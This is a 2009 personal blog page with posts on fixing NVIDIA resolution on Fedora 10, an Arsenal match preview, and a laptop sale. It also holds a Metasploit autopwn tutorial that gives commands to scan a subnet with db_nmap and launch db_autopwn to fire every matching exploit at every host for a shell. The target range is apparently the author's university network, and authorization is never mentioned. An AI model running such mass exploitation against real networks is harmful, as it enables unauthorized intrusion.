Popular Posts


Gnome 3

Get your 'Delete' button back!

Fedora 15 + Eclipse = Android SDK

Setup Android SDK with Eclipse on your Fedora 15

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

26 January 2009

Fedora 10 : Change Resolution

First of all, I'm having trouble with changing the resolution of my Fedora 10. I can't change from 800x600 resolution to 1400x900.

So after googling around, I found it almost driver problem.

Therefore, here is the workaround until the fix is issued.

1.Remove any nvidia driver from repo. "yum remove kmod-nvidia". Reboot.
2.Download http://us.download.nvidia.com/XFree86/Linux-x86/180.22/NVIDIA-Linux-x86-180.22-pkg1.run
3.Make sure kernel-headers and kernel-devel is already installed. If not, "yum install -y kernel-headers kernel-devel".
4.Kill your X. In terminal, as root, "/sbin/init 3".
5. "sh NVIDIA-Linux-x86-180.22-pkg1.run". Depends where you save it in your computer.
6.Skip download kernel headers from internet.After done with compile the kernel with the nvidia driver, reboot.
7.System Tools > NVIDIA X Server Settings. Set to your desire resolution.Apply.Saved, but you cant. Here is the next workaround.
8.Click Save X Config > Show preview. Copy all the configuration and paste in xorg.conf. Save.
9.Preferences > Hardware Resolution > Set to your desire resolution.
10.Done!

At least, works for me. Feel free to ask. :)

16 January 2009

Hull City vs Arsenal

Date : 18th January 2009
Time : 1.25 a.m
Venue : Kingston Communications Stadium
Channel : Star Sport, 813 (Astro)
Last Match : Arsenal 1 - 0 Bolton

With the last match we find it difficult to score goal, finally Nicklas Bendtner broke the deadlock on the 84th minutes. From the match, what I see is the lack of the creativity in the midfield. We really missing the creative force in the midfield after Fabregas sidelined with the injury. Although we link with several players including Arteta and Arshavin, but from Arsenal official website is more focus on Arshavin.

He also mention we got another target for the reinforcement. We will maybe see new faces in the midfield who possess creativity far more than defensive. I think Mr. Wenger have his full faith with Denilson after superb start early in the season not to mention several assist too.

Hull at home, we already lost to them at home after superb strike from Geovanni. Let's hope our defensive line close him enough to limit his long distance shooting threat. Arsenal must win this match to stay in the race. Although the medias stating that Arsenal is on the way of loosing the 4th place to Aston Villa, I still believe we still can make it if we can get new faces in our team.

Arsenal won 3-1!! :)

13 January 2009

WTS - Want To Sell

Sony VAIO VGN-NR37G/S

Bought on Dec,08 (after raya). Still got two years warranty from SenQ and Sony.

Warranty : Yes. 2 years. End on Dec 2010

Reason for sell : Money $$

Spec :
  • Intel Pentium Dual-Core Processor T2390 (1.86Ghz)
  • RAM - DDR2 1.5Gb
  • HDD - 250Gb
  • Display Screen Size - 15.4 inches
  • Max Display Resolution - 1280 x 800
  • Video Card - Graphics Media Accelerator X3100
  • Weight - 2.9kg
  • Battery Life - 4 Hours

Contacts : Leave a comment or email me at komodolion@gmail.com

Pictures :




Price : RM 2000

Metasploit autopwn

autopwn - automated execution of exploit. Rooting will be much easier for us! at least for me, but with no luck, i never manage to get a shell :(

This tutorial will based on Fedora 9..

Let’s start.. what we need?

  • Postgres
  • Metasploit Framework
  • Brain

Metasploit Framework

Postgres - yum install postgres

Brain - yum install brain <>

First, start the postgresql service (/sbin/service postgresql start). For the first time, you might to setup the postgres. We will go through later. Metasploit 3 uses the ActiveRecord module (part of RoR) to provide an object-oriented interface to an arbitrary database service. Here the steps..

gem install activerecord

gem install postgresql (we use postgres as our database)

To verify our installation which produce no output of error.

$ ruby -e ‘require “rubygems”; require_gem “postgres”;’

Update ur framework! Change to the framework directory.

svn update

Postgres. Create the database. Make sure ur postgresql running first.

#su - postgres

$ psql -d template1 -U postgres

Output :

Welcome to psql 7.4.16, the PostgreSQL interactive terminal.

Type: \\copyright for distribution terms
\\h for help with SQL commands
\\? for help on internal slash commands
\\g or terminate with semicolon to execute query
\\q to quit

template1=#

Next.

template1=# CREATE USER root WITH PASSWORD ‘myPassword’;

template1=# CREATE DATABASE metasploit3;

template1=# GRANT ALL PRIVILEGES ON DATABASE root to metasploit3;

template1=# \q

Done with our postgres stuff. Change to framework directory. Type ./msfconsole. Now u hv console for the metasploit.

[root@localhost framework-3.1]# ./msfconsole

| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|

=[ msf v3.1-release
+ -- --=[ 268 exploits - 118 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >

In the console, type :

load db_postgres

db_create (you will see several notice. Ignore)

db_hosts (shoud give you no output of error. Which mean your database connection with postgres is available)

db_nmap 164.0.3.* ( Change the IP according to your target. You can also change the db_namp commands. db_nmap -p 445 164.0.3.*. db_nmap will identify any host that expose the SMB service)

Done with our scanning.The fun part begin! Ouch, before that, take a look at db_autopwn commands.

msf > db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range

Launch our attack!

db_autpwn -p -t -e

It will take time. So wait! If you are lucky enough, u will get a shell.

References:PostgreSQL add or create a user account and grant permission for database

http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html

Cheers~




Whois

who: saks0ba a.k.a kOmOdO^lioN

uptime : ask XD

top :firefox,amarok, xchat, pidgin, linuxdcpp etc..

ifconfig : 164.0.3.* (I’m at UTP! Okay?)

dir : /home/saks0ba/ <– my room.. :D

OS : Fedora 9 Sulphur and Winblow$

enough.. aish~

I’m studying at Universiti Teknologi PETRONAS in Electric and Electronic Engineering.

2nd Year 2nd Semester.. wiu~. I’m gonna go for intern later on..

Very interested in whatever related to computers, security network, hackin9 (/me noob kaw² && enlighten me mastah~ ) and electronics gadget? I wish I had some, but.. money2. kene stop dreaming la ni.. haha

Gunners fan! although always clumsy in the end.. aish.

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More